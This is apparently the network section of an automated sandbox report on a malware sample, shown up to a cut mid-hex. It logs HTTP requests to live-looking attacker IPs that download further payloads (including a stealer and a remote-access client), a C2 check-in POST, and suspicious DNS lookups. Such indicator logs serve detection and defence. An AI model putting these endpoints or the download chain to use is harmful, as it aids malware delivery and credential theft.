Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 17_2_005CBD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

17_2_005CBD60

Source: global traffic	HTTP traffic detected: GET /inc/GOLD.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /inc/crypteda.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /setup2.exe HTTP/1.1Host: 154.216.18.223
Source: global traffic	HTTP traffic detected: GET /inc/stealc_default2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.17Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /inc/Set-up.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/sqlite3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/freebl3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /inc/runtime.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/mozglue.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/msvcp140.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/nss3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /inc/XClient_protected.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/softokn3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/vcruntime140.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /inc/BitcoinCore.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /inc/whiteheroin.exe HTTP/1.1Host: 185.215.113.16

Source: wxfM3haI2K.exe, 0000001A.00000002.1943505648.00000000032ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
Source: wxfM3haI2K.exe, 0000001A.00000002.1943505648.00000000032ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\ equals www.youtube.com (Youtube)
Source: wxfM3haI2K.exe, 0000001A.00000002.1943505648.00000000032ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q#www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
Source: wxfM3haI2K.exe, 0000001A.00000002.1943505648.00000000032ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: fivexx5vs.top
Source: global traffic	DNS traffic detected: DNS query: yosoborno.com
Source: global traffic	DNS traffic detected: DNS query: oytrtojfgh.asia
Source: global traffic	DNS traffic detected: DNS query: jirafasaltas.fun

Source: unknown

HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 26 Aug 2024 21:29:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 e5 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 26 Aug 2024 21:29:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 26 Aug 2024 21:29:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 26 Aug 2024 21:29:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 26 Aug 2024 21:29:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 26 Aug 2024 21:29:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 26 Aug 2024 21:29:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 26 Aug 2024 21:29:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 26 Aug 2024 21:29:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 76 12 7e 54 e0 37 00 fd ff 4f bd 9f f1 a3 23 db 20 c2 b6 26 42 10 Data Ascii: #\v~T7O# &B
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 26 Aug 2024 21:30:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 26 Aug 2024 21:30:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 26 Aug 2024 21:30:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 26 Aug 2024 21:30:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 